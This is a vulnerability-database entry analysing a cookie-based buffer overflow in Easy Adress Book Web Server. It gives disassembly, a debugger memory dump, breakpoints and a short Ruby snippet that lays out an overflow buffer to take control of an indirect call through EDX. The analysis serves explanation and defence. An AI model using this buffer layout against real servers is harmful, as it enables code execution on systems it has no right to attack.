Attacker Value
Unknown
(1 user assessed)
Exploitability
Unknown
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
0

Easy Adress Book Web Server Buffer Overflow

Last updated February 13, 2020
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Easy Adress Book Web Server suffers from a vulnerability while processing a user-supplied cookie, specifically the UserID parameter, which allows the attacker to cause a buffer overflow and result a crash or gain arbitrary code execution under the context of the user. This was originally discovered by Tracy Turben, and was submitted to Metasploit as an exploit module by Muhammet Dilmac (of ADEOSec).

Add Assessment

1
Technical Analysis

-


In addition, ```var_DE64``` is used to store the ```UserID``` information by a simple memcpy routine:

.text:0040F2D7 mov eax, ecx
.text:0040F2D9 mov esi, edi
.text:0040F2DB mov edi, edx
.text:0040F2DD push ebx
.text:0040F2DE shr ecx, 2
.text:0040F2E1 rep movsd


If ```UserID``` has a value of "AAAA", in a debugger the buffers would look like this:

01EEB494 41414141 AAAA
01EEB498 00000000 ….
01EEB49C 00000000 ….
01EEB4A0 00000000 ….
01EEB4A4 00000000 ….
01EEB4A8 00000000 ….
01EEB4AC 00000000 ….
01EEB4B0 00000000 ….
01EEB4B4 00000000 ….
01EEB4B8 00000000 ….
01EEB4BC 00000000 ….
01EEB4C0 00000000 ….
01EEB4C4 00000000 ….
01EEB4C8 00000000 ….
01EEB4CC 00000000 ….
01EEB4D0 00000000 ….
01EEB4D4 01000101 .
01EEB4D8 016EE168 hán ASCII “2.60 ,MyDB Engine,Copyright_2002 MGH Software Inc.”
01EEB4DC 00518470 p„Q. abws.00518470
01EEB4E0 00518470 p„Q. abws.00518470
01EEB4E4 004F2F7C |/O. abws.004F2F7C
01EEB4E8 00000250 P..


In the above example, the range from 01EEB494 to 01EEB4D0 is exactly 64 bytes, this is our
```var_DE64``` buffer. Right below that is our ```var_DE24```, which is what ESI points to
at the time of the crash. At the 0x10th byte of ESI is where EDX is, which is used by the
```CALL DWORD [edx+28h]``` instruction. The following code represents this:

```ruby
buf = "A" * 64         # 64 bytes for var_DE64
buf << "BBBB"          # We start overwriting var_DE24 buffer here
buf << "C" * (16-4)    # Padding for [ESI+10h] so the 16th DWORD is our DDDD
buf << "DDDD"          # EDX (which will be used by the CALL DWORD [edx+28h] instruction)
buf << "E" * (4 * 100) # Extra padding so we can see the overflow better

Since the overflow ends up writing an object in var_DE24 and gets used by the function,
this results a type confusion (a string being treated as an object).

Breakpoints

  • The first breakpoint is the alloca_probe call
  • The second breakpoint is the destination buffer for the mempcy that copies the UserID value to var_DE64
  • The third is the beginning of the vulnerable function
0:006> bl
 0 e 0040f10a     0001 (0001)  0:**** abws+0xf10a
 1 e 0040f2db     0001 (0001)  0:**** abws+0xf2db
 2 e 0040f0f0     0001 (0001)  0:**** abws+0xf0f0
Log in to Add Reply

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Unknown
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis